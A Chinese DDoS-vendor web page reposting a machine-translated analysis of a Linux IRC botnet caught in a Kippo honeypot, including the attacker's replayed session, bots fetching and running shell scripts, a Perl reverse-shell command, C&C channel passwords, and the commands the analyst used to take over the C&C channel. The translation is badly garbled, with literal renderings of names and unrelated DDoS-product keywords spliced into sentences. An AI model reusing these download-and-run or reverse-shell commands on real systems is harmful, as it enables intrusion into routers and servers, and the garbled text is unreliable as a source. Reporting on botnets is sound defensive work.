DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > WEB安全 > 正文

服务器无限防御_公司_ddos怎么防护

04-09 WEB安全

服务器无限防御_公司_ddos怎么防护

就在我考虑写下一篇文章的时候,我想到了。实际上是以一个不知名的消息来源的形式来找我的。我们打电话给不具名的消息来源…鲍勃!Bob维护着一个Kippo蜜罐,上周末蜜罐被一个Linux僵尸网络渗透。鲍勃是一个聪明的安全专业人士,他欣赏不受欢迎的客人从前门冲下来……好吧,只有在蜜罐。Bob慷慨地分享了他上个周末的工作,从某种程度上讲,是跟随breadcrumbs到指挥与控制(C&C)的工作。普通人可能对普通人来说太技术化了。如果你是那种喜欢下流下流和/或有时间的人,那么完整的成绩单就可以公开了。享受吧!对于我们其他人来说,故事的开始是Bob发现事件日志,表明一个新的bot正在试图下载并执行几个shell脚本。以下是日志的重播:kippo@fakeserver:~/kippo/log/tty$python.././utils/playlog.py20140207-104738-1172.logfakeserver:~#外壳bash:shell:找不到命令传真ddosgb.com/ddos1/22572.html">服务器:~#cd/var/run-bash:cd:/var/run:不是一个目录传真服务器:~#wget–2014-02-07 10:47:47-正在连接到修订:80…已连接。HTTP请求已发送,正在等待响应…测试!-e wgsh和busybox wget上海wgsh上海bbsh200行长度:590(590字节)[text/plain;字符集=ISO-8859-1]保存到:`wgsh100%[========================================>]5902014-02-07 10:47:49(0 KB/s)–"wgsh"已保存[590/590]传真服务器:~鲍勃想知道袭击者是谁,所以他做了一些侦察。使用"whois"和"nslookup"工具,我们发现攻击源来自阿根廷一家ISP的IP地址,维盟ddos防御,假设该IP地址不是伪造的。您可以自己运行下面的命令来查看结果。$whois 201.252.2.117美元$nslookup 201.252.2.117美元bash脚本将在Bob的列表中分析下一步。完整的列表可在成绩单第3页阅读。Bob分析了他对脚本执行意图的观察,"第一个脚本wgsh下载二进制文件并尝试执行它们。它还试图对DD-WRT和OpenWRT中常用的nvram变量rc_防火墙进行后门攻击,这一点很有趣,因为攻击者正试图感染无线接入点。如果你还记得,类似这样的事情是在2012年通过卡纳僵尸网络进行的。在与鲍勃讨论后,他确定这两种攻击方法是相似的。我们推测有人恶意阅读了卡纳的论文,然后修改了它。Bob继续说,"攻击者可能瞄准各种架构,包括MIPS、ARM和x86。第二个脚本,nvr,拉低一组不同的二进制文件并尝试再次执行它们。第三个脚本用于在系统上只存在busybox的情况下使用,但其功能与wgsh相同,但没有nvram后门技巧。"分析转移到名为irq32的二进制下载文件。Bob在虚拟机中使用strace和WireShark工具进行动态分析:$strace./irq32-s 1500-e trace=网络、读、写$strace-ps 1500-e trace=网络、读、写Bob发现"strace部分…实际上是在域上进行DNS查找,以验证Internet连接,然后创建一个套接字来连接到命令和控件。"对WireShark网络流量跟踪进行分析后,结果如下:1连接到IRC C C&C2设置尼克尼克x32 | x | 388943 | Ubuntu三。设置用户用户x00 localhost localhost:#x004回复Ping乒乓球:CA3F65F75服务器发送CTCP版本以检测连接的客户端是否为bot:IRC!IRC@molot.ovPRIVMSG x32 | x | 388943 | ubuntu:版本6C&C告诉机器人加入#all then#x01:x32 | x | 388943 | ubuntu!x00@修订版加入:#全部7Bot使用密码777加入#x01加入#x01:7778用户x00邀请bot加入#x00,密码为1391556153:莫洛特.ov333x32 | x | 388943 | ubuntu#x01 x00 13915561539攻击者向#x01中的所有32位主机发出shell命令id:x00!pwned@lolhome酒店PRIVMSG#x01:!x32*SH标识10攻击者开始在各种主机上删除perl脚本:x00!pwned@lolhome酒店PRIVMSG#x01:!x32*3 SH工作台&&perl/tmp/bcpl修订版8080在第10行中,下载到"受感染"设备的PERL脚本使用一种常见的反向shell方法来打开后门。后门用于远程保存系统名称、用户ID、当前工作目录和正在使用的shell。Bob检测到web服务器已启用目录列表。经过一番打猎,他发现了一个名为"x00"的文件夹,cc攻击这么防御,该文件夹用于上面的第3、8、9和10行。在检索到的文件中,最有趣的文件名为"Kaiten.c",据信是c&c客户端。接下来的步骤是手动执行上面僵尸网络客户端使用的相同命令。在这一点上,辩论进入了关于鲍勃是否应该停止在这里或继续帮助无辜者的对话。关于"反击"与否的争论超出了本文的讨论范围,但对于任何阅读并感到有必要在下面发表评论的人来说,安卓ddos防御工具,我们都会提到。去吧!键入的手动命令如下所示:步骤1)/设置irc.ctcp.版本""步骤2)/connect修订版步骤3)/NICK x32 | x | 388943 | ubuntu步骤4)/连接#x01 777步骤5)/join#x00 1391556153步骤6)/msg#x00!*SH uname-a公司结果是调用了1807个机器人,并提供了如下信息:15: 24:49修订版--| TH | Ms | f | 999549 | WRT54GL(x00@修订版):Linux 2.4.20#4 1月1日星期一09:48:10 PST 2007 mips未知Bob知道管理这些设备的个人不知道bot的活动,他需要通知他们。他发送了一个命令来响应警告消息"更改SSH密码。由于密码不足,您的服务器已被破坏。"再次强调,华为云ddos防御上限,更改设备(尤其是基础设施设备)上的默认密码以及使用强密码的重要性是多么重要。第二天,进入IRC频道的是剩下的15个机器人。为了了解发现的Kippo僵尸网络的全球影响,Bob在Python脚本的帮助下做了一些统计分析。#体系结构mips公司armv5tel公司armv5tejl1686年x86?64armv4l#按体系结构列出的主机数量armv5tejl1300mips公司499armv5tel公司4armv4l21686年1x86?641对于更大的数据量,ddos防御软件,我把它们转换成漂亮的图表,这样看起来更容易。受感染的硬件设备类型按国家列出的机器人程序Bob最后总结了一段话:"来自阿根廷的机器人通过弱的ssh凭据损害了服务器。从俄罗斯服务器上取下shell脚本。Shell脚本从多个俄罗斯服务器中下拉二进制文件。二进制文件回拨到印度的服务器。C&C从泰国的服务器上调出各种Perl脚本。Perl脚本会调用位于美国西雅图的服务器。大多数受损主机位于约旦、沙特阿拉伯和孟加拉国。几乎所有的主机都是基于ARM或MIPS的架构,这意味着它们很可能是路由器。不管怎样,第二天我重新登录服务器,它们只有15个机器人。"Bob,感谢您跟踪breadcrumbs的踪迹回到IRC频道,在那里您使一些管理员能够从Kippo僵尸网络收回对他们设备的控制。梭鱼的读者期待着你的下一个发现。

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: http://www.ddosgb.com/web/39895.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 5482293访问次数
  • 建站天数

    DDOS防御

    ddos防御

    cc防护

    web安全

    高防服务器

    高防cdn


    QQ客服

    400-0797-119

    X